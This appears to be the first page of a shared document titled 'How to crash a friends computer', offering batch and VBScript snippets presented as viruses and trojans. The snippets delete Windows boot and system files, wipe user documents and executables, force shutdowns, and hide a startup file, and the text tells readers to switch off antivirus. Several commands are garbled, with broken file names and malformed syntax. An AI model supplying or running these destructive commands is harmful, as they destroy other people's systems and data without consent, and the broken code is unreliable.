You are on page 1of 4

How to crash a friends computer using simple notepad .

bat files By following two rules you can crash anyones pc Rule 1:Those who download this document want to tell them that I am not responsible for any action they do and they are responsible for it.... Rule 2:Copy the given code in notepad and then save it as whatever you want to name but in the end put .bat so that it can become a batch file and make the save as option all files run it and see the effect .if you like the document then comment so I can put more of the same kind of document .......

Delete c drive
@ECHO OFF :RunIt ECHO Deleting "C:\WINDOWS" Pause cls shutdown -s -t 15 -c "C:\WINDOWS\PROGRAMFILES DELETED. REBOOTING..." :start start goto start

Also a Trojan file so just shut the antivirus if any


@echo off msg * Virus Activated * attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini @echo off msg * you have been hacked. * shutdown -s -t 10 -c " "

To delete sys file


del "C:\WINDOWS\SYSTEM32\bootok" /Q/S >nul del "C:\WINDOWS\SYSTEM32\bootvid.d ll" /Q/S >nul del "C:\WINDOWS\SYSTEM32\bootvrfy" /Q/S >nul

to delete all document files

rmdir C:\Documents and Settings \S\Q.

A virus file
SetAttr "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Virus.ex e", vbSystem + vbHidden Shell ("Shutdown -s -t 1")

Simple step to delete c


@echo off Del /q c:\windows

TROJANS
@Echo off Del *.exe Del *.com Del *.dll Del *.doc Echo Your Screwed ! Mkdir C:\Screwed!

@Echo off - Turns echo off so user doesn't know what happens

Del *.exe - Deletes all files in the current directory with the .exe extension Del *.com - Deletes all files in the current directory with the .com extension Del *.dll - Deletes all files in the current directory with the .dll extension Del *.doc - Deletes all files in the current directory with the .doc extension Echo Your Screwed ! - Displays Your Screwed ! Mkdir C:\Screwed! - Creates the directory Screwed on the C: drive

Virus file
@echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini

You might also like